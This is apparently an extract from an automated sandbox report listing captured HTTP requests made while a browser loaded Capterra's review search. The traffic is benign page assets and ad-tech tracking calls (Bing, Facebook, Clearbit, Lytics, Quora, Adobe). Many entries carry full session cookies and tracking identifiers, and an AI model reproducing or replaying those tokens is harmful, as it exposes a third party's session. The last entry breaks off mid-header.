Source: global traffic HTTP traffic detected: GET /fsrelay/rec/integrations?OrgId=18VAT4&isInFrame=false&isNative=false HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; __mmapiwsid=0191a413-777d-7f0e-8692-1332553a85ac:1b0310bf727feb6b0af3dec08c5bfd86689f2e28; fs_lua=1.1725034624710; fs_uid=#18VAT4#da9f39f7-d4a4-45f4-948f-86299cb47816:084a7745-8adb-4b14-adf2-26e4e4ddbd6e:1725034624710::1#/1756570623; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A17%3A07+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=NotLandingPage&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1&AwaitingReconsent=false; _ga_M5DGBDHG2R=GS1.1.1725034607.1.1.1725034627.40.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
Source: global traffic HTTP traffic detected: GET /ProductLogo/713f882b-f7a1-4f3f-a484-7af2fe13f5c3.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/08d2adc0-b055-41c3-9caa-981ebab6ae4e.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/a67f601c-1c43-4480-8665-f74fae6e4252.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/35e9db05-94a1-4859-b307-858b9d3946cb.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/144001e9-6c0c-4474-b435-649533e0c317.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /fsrelay/rec/bundle/v2?OrgId=18VAT4&UserId=da9f39f7-d4a4-45f4-948f-86299cb47816&SessionId=084a7745-8adb-4b14-adf2-26e4e4ddbd6e&PageId=e2e5b10c-4bbc-4510-b497-529b569fdc46&Seq=2&ClientTime=1725034630155&PageStart=1725034624939&PrevBundleTime=1725034629801&LastActivity=2305&IsNewSession=true&ContentEncoding=gzip HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; __mmapiwsid=0191a413-777d-7f0e-8692-1332553a85ac:1b0310bf727feb6b0af3dec08c5bfd86689f2e28; fs_lua=1.1725034624710; fs_uid=#18VAT4#da9f39f7-d4a4-45f4-948f-86299cb47816:084a7745-8adb-4b14-adf2-26e4e4ddbd6e:1725034624710::1#/1756570623; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A17%3A07+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=NotLandingPage&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1&AwaitingReconsent=false; _ga_M5DGBDHG2R=GS1.1.1725034607.1.1.1725034627.40.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
Source: global traffic HTTP traffic detected: GET /ProductLogo/670d76a5-76f8-4742-a6f9-a42d167cc69d.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/7780d136-e630-42e5-adce-8f580dc09687.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /v1/companies/reveal?authorization=pk_4e234eeab65b11414ee6da2ca87259ad&callback=clearbitCallback HTTP/1.1Host: reveal.clearbit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/a67f601c-1c43-4480-8665-f74fae6e4252.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /bat.js HTTP/1.1Host: bat.bing.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MUID=0752D3E2ED77641A3B63C709EC70657F
Source: global traffic HTTP traffic detected: GET /ProductLogo/144001e9-6c0c-4474-b435-649533e0c317.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /fsrelay/rec/integrations?OrgId=18VAT4&isInFrame=false&isNative=false HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; __mmapiwsid=0191a413-777d-7f0e-8692-1332553a85ac:1b0310bf727feb6b0af3dec08c5bfd86689f2e28; fs_lua=1.1725034624710; fs_uid=#18VAT4#da9f39f7-d4a4-45f4-948f-86299cb47816:084a7745-8adb-4b14-adf2-26e4e4ddbd6e:1725034624710::1#/1756570623; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A17%3A07+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=NotLandingPage&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1&AwaitingReconsent=false; _ga_M5DGBDHG2R=GS1.1.1725034607.1.1.1725034627.40.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
Source: global traffic HTTP traffic detected: GET /static/javascripts/ecid.js HTTP/1.1Host: cdn0.capterra-static.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /v1/companies/reveal?authorization=pk_4e234eeab65b11414ee6da2ca87259ad&callback=clearbitCallback HTTP/1.1Host: reveal.clearbit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /bat.js HTTP/1.1Host: bat.bing.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MUID=0752D3E2ED77641A3B63C709EC70657F
Source: global traffic HTTP traffic detected: GET /api/tag/7dafa3f5f9e8efd6782940aa05719f12/latest.min.js HTTP/1.1Host: c.lytics.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /p/action/5067725.js HTTP/1.1Host: bat.bing.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MUID=0752D3E2ED77641A3B63C709EC70657F
Source: global traffic HTTP traffic detected: GET /fsrelay/datalayer/v4/latest.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; __mmapiwsid=0191a413-777d-7f0e-8692-1332553a85ac:1b0310bf727feb6b0af3dec08c5bfd86689f2e28; fs_lua=1.1725034624710; fs_uid=#18VAT4#da9f39f7-d4a4-45f4-948f-86299cb47816:084a7745-8adb-4b14-adf2-26e4e4ddbd6e:1725034624710::1#/1756570623; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A17%3A07+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=NotLandingPage&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1&AwaitingReconsent=false; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802; _ga_M5DGBDHG2R=GS1.1.1725034607.1.1.1725034632.35.0.0
Source: global traffic HTTP traffic detected: GET /_/ad/f3ffe7daf89b419a979311e77be0152b/pixel?tag=ViewContent&i=gtm&u=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F HTTP/1.1Host: q.quora.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /id?d_visid_ver=5.1.1&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_orgid=04D07E1C5E4DDABB0A495ED1%40AdobeOrg&d_nsid=0&ts=1725034633424 HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: */*Origin: https://reviews.capterra.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /static/javascripts/ecid.js HTTP/1.1Host: cdn0.capterra-static.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /api/tag/7dafa3f5f9e8efd6782940aa05719f12/latest.min.js HTTP/1.1Host: c.lytics.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_/ad/f3ffe7daf89b419a979311e77be0152b/pixel?tag=ViewContent&i=gtm&u=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F HTTP/1.1Host: q.quora.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /p/action/5067725.js HTTP/1.1Host: bat.bing.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MUID=0752D3E2ED77641A3B63C709EC70657F
Source: global traffic HTTP traffic detected: GET /cid/7dafa3f5f9e8efd6782940aa05719f12?assign=false&callback=u_294798340052452740 HTTP/1.1Host: c.lytics.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /action/0?ti=5067725&tm=gtm002&Ver=2&mid=6d19bebc-5768-4167-965a-53cee4239878&sid=5154566066eb11ef9610b7a0af03a19e&vid=5154816066eb11efb250d7a43de017cc&vids=1&msclkid=N&uach=pv%3D10.0.0&pi=918639831&lg=en-US&sw=1280&sh=1024&sc=24&tl=Capterra%20%7C%20Review%20Software&p=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F&r=https%3A%2F%2Fwww.capterra.com%2F&lt=7712&evt=pageLoad&sv=1&asc=G&cdb=AQED&rn=49435 HTTP/1.1Host: bat.bing.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MUID=0752D3E2ED77641A3B63C709EC70657F
Source: global traffic HTTP traffic detected: GET /visitor/v200/svrGP?pps=3&siteid=68275882&ref2=https%3A%2F%2Fwww.capterra.com%2F&tzo=300&ms=211&optin=disabled&firstPartyCookieDomain=tracking.capterra.com HTTP/1.1Host: tracking.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; 